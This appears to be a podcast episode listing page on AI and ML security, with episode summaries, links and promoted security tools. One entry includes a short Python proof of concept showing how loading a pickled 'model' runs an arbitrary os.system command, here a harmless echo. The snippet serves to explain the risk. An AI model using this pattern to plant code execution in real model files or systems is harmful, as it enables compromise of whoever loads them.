
Season 3 Finale: Top Insights, Hacks, and Lessons from the Frontlines of AI Security
21/7/2025 | 24 min
To close out Season 3, we’re revisiting the standout insights, wildest vulnerabilities, and most practical lessons shared by 20+ AI practitioners, researchers, and industry leaders shaping the future of AI security. If you're building, breaking, or defending AI/ML systems, this is your must-listen roundup.

Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/season-3-finale-top-insights-hacks-and-lessons-from-the-frontlines-of-ai-security

Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com.

Additional tools and resources to check out:
Protect AI Guardian: Zero Trust for ML Models
Recon: Automated Red Teaming for GenAI
Protect AI’s ML Security-Focused Open Source Tools
LLM Guard: Open Source Security Toolkit for LLM Interactions
Huntr: The World's First AI/Machine Learning Bug Bounty Platform

Breaking and Securing Real-World LLM Apps
16/7/2025 | 53 min
Fresh off their OWASP AppSec EU talk, Rico Komenda and Javan Rasokat join Charlie McCarthy to share real-world insights on breaking and securing LLM-integrated systems.

Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/breaking-and-securing-real-world-llm-apps

How Red Teamers Are Exposing Flaws in AI Pipelines
9/7/2025 | 41 min
Prolific bug bounty hunter and Offensive Security Lead at Toreon, Robbe Van Roey (PinkDraconian), joins the MLSecOps Podcast to break down how he discovered RCEs in BentoML and LangChain, the risks of unsafe model serialization, and his approach to red teaming AI systems.

Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/how-red-teamers-are-exposing-flaws-in-ai-pipelines
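The "unsafe model serialization" risk mentioned above usually refers to model formats built on Python's pickle, which can execute arbitrary code the moment a file is loaded. Below is a minimal, hypothetical sketch of that failure class, not a reproduction of the BentoML or LangChain findings discussed in the episode:

import os
import pickle

class MaliciousModel:
    """pickle calls __reduce__ when deserializing; the callable it returns
    runs during load, so a harmless echo stands in for a real payload."""
    def __reduce__(self):
        return (os.system, ("echo pwned: code ran while loading the model",))

# An attacker ships this bytestream as a "trained model" artifact...
payload = pickle.dumps(MaliciousModel())

# ...and the command above executes as soon as a service deserializes it.
pickle.loads(payload)  # never unpickle untrusted model files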

Securing AI for Government: Inside the Leidos + Protect AI Partnership
25/6/2025 | 34 min
On this episode of the MLSecOps Podcast, Rob Linger, Information Advantage Practice Lead at Leidos, joins hosts Jessica Souder, Director of Government and Defense at Protect AI, and Charlie McCarthy to explore what it takes to deploy secure AI/ML systems in government environments.

Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/securing-ai-for-government-inside-the-leidos-protect-ai-partnership

Holistic AI Pentesting Playbook
13/6/2025 | 49 min
Jason Haddix, CEO of Arcanum Information Security, joins the MLSecOps Podcast to share his methods for assessing and defending AI systems.

Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/holistic-ai-pentesting-playbook



The MLSecOps Podcast